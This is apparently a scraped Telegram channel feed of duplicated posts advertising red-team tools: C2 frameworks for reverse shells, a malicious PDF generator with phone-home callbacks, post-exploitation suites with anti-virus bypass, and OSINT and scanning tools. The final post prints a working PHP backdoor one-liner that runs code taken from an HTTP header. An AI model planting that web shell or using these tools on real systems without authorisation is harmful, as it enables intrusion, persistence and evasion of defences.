Hunt down social media accounts by username across social networks
😸 Github
⬇️ Installation
┌──(BugCod3㉿Arch)-[~]
└─$ git clone https://github.com/sherlock-project/sherlock.git
┌──(BugCod3㉿Arch)-[~]
└─$ cd sherlock
┌──(BugCod3㉿Arch)-[~]
└─$ python3 -m pip install -r requirements.txt
◀️ Usage
┌──(BugCod3㉿Arch)-[~]
└─$python3 sherlock --help
┌──(BugCod3㉿Arch)-[~]
└─$python3 sherlock user123
┌──(BugCod3㉿Arch)-[~]
└─$python3 sherlock user1 user2 user3
#Python #Sherlock #Redteam
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
┌──(BugCod3㉿Arch)-[~]
└─$ git clone https://github.com/sherlock-project/sherlock.git
┌──(BugCod3㉿Arch)-[~]
└─$ cd sherlock
┌──(BugCod3㉿Arch)-[~]
└─$ python3 -m pip install -r requirements.txt
┌──(BugCod3㉿Arch)-[~]
└─$python3 sherlock --help
┌──(BugCod3㉿Arch)-[~]
└─$python3 sherlock user123
┌──(BugCod3㉿Arch)-[~]
└─$python3 sherlock user1 user2 user3
#Python #Sherlock #Redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.
⬇️ Download
🦊 GitHub
#Security #Network_Attacks #RedTeam #Tools
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
⬇️ Download
🦊 GitHub
#Security #Network_Attacks #RedTeam #Tools
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Very useful tool for scanning the directories of a website
⬇️ Download
🦊 GitHub
#Security #Dirsearch #RedTeam #Tools
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
⬇️ Download
🦊 GitHub
#Security #Dirsearch #RedTeam #Tools
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Villain 🦹♀️
Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells, enhance their functionality with additional features (commands, utilities etc) and share them among connected sibling servers (Villain instances running on different machines).
GitHub
#Python #RedTeam #CyberSecurity
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells, enhance their functionality with additional features (commands, utilities etc) and share them among connected sibling servers (Villain instances running on different machines).
GitHub
#Python #RedTeam #CyberSecurity
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
👍1
Nishang
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
GitHub
#PowerShell #Penetration_Testing #RedTeam
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
GitHub
#PowerShell #Penetration_Testing #RedTeam
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
RedTeam-Tools
This github repository contains a collection of 125+ tools and resources that can be useful for red teaming activities.
Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.
GitHub
BlueTeam-Tools
#RedTeam
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
This github repository contains a collection of 125+ tools and resources that can be useful for red teaming activities.
Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.
GitHub
BlueTeam-Tools
#RedTeam
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
❤🔥3⚡1
Kubernetes Goat
✨ The Kubernetes Goat is designed to be an intentionally vulnerable cluster environment to learn and practice Kubernetes security 🚀
🏆 Scenarios
Sensitive keys in codebases
DIND (docker-in-docker) exploitation
SSRF in the Kubernetes (K8S) world
Container escape to the host system
Docker CIS benchmarks analysis
Kubernetes CIS benchmarks analysis
Attacking private registry
NodePort exposed services
Helm v2 tiller to PwN the cluster - [Deprecated]
Analyzing crypto miner container
MORE+++
GitHub
#RedTeam #Security #Vuln_App
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
✨ The Kubernetes Goat is designed to be an intentionally vulnerable cluster environment to learn and practice Kubernetes security 🚀
🏆 Scenarios
Sensitive keys in codebases
DIND (docker-in-docker) exploitation
SSRF in the Kubernetes (K8S) world
Container escape to the host system
Docker CIS benchmarks analysis
Kubernetes CIS benchmarks analysis
Attacking private registry
NodePort exposed services
Helm v2 tiller to PwN the cluster - [Deprecated]
Analyzing crypto miner container
MORE+++
GitHub
#RedTeam #Security #Vuln_App
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🔥1
Malicious PDF Generator ☠️
Generate ten different malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
Usage
Purpose
⚪️ Test web pages/services accepting PDF-files
⚪️ Test security products
⚪️ Test PDF readers
⚪️ Test PDF converters
GitHub
#RedTeam #PDF #Pentesting
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Generate ten different malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
Usage
┌──(BugCod3㉿kali)-[~]
└─$ python3 malicious-pdf.py burp-collaborator-url
Output will be written as: test1.pdf, test2.pdf, test3.pdf etc in the current directory.Purpose
⚪️ Test web pages/services accepting PDF-files
⚪️ Test security products
⚪️ Test PDF readers
⚪️ Test PDF converters
GitHub
#RedTeam #PDF #Pentesting
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🔥4
VIPER
⚪️ Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration
⚪️ Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on
⚪️ Viper has integrated 80+ modules, covering Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection and other categories
⚪️ Viper's goal is to help red team engineers improve attack efficiency, simplify operation and reduce technical threshold
⚪️ Viper supports running native msfconsole in browser and multi - person collaboration
Site
Installation manual
GitHub
#RedTeam #Viper #Post_Exploitation
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
⚪️ Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration
⚪️ Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on
⚪️ Viper has integrated 80+ modules, covering Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection and other categories
⚪️ Viper's goal is to help red team engineers improve attack efficiency, simplify operation and reduce technical threshold
⚪️ Viper supports running native msfconsole in browser and multi - person collaboration
Site
Installation manual
GitHub
#RedTeam #Viper #Post_Exploitation
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
❤1🫡1
WinPwn
To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration.
The script is mostly based on well-known large other offensive security Powershell projects.
GitHub
#RedTeam #PowerShell #Pentesting
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration.
The script is mostly based on well-known large other offensive security Powershell projects.
GitHub
#RedTeam #PowerShell #Pentesting
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🔥1
Full-featured C2 framework which silently persists on
webserver via polymorphic PHP oneliner
Overview
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
Efficient: More than 20 plugins to automate privilege-escalation tasks
Stealth: The framework is made by paranoids, for paranoids
Convenient: A robust interface with many crucial features
Supported platforms (as attacker):
#RedTeam #Web_Hacking #HackTool
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
webserver via polymorphic PHP oneliner
Overview
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>Features
Efficient: More than 20 plugins to automate privilege-escalation tasks
Stealth: The framework is made by paranoids, for paranoids
Convenient: A robust interface with many crucial features
Supported platforms (as attacker):
GNU/LinuxSupported platforms (as target):
Mac OS X
GNU/LinuxGitHub
BSD-like
Mac OS X
Windows NT
#RedTeam #Web_Hacking #HackTool
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🤯1